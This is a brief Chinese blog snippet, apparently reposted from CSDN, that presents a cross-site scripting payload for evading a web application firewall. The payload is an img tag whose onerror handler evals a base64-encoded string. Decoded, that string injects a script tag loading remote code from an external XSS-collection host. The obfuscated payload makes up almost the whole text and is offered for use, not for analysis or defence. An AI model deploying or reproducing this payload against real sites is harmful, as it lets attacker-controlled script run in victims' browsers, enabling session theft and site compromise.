xss脚本绕过waf

<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0ZweWpnUz8nK01hdGgucmFuZG9tKCk='))>

atob解密后是真正的js代码

猜你喜欢

转载自blog.csdn.net/a843538946/article/details/85215572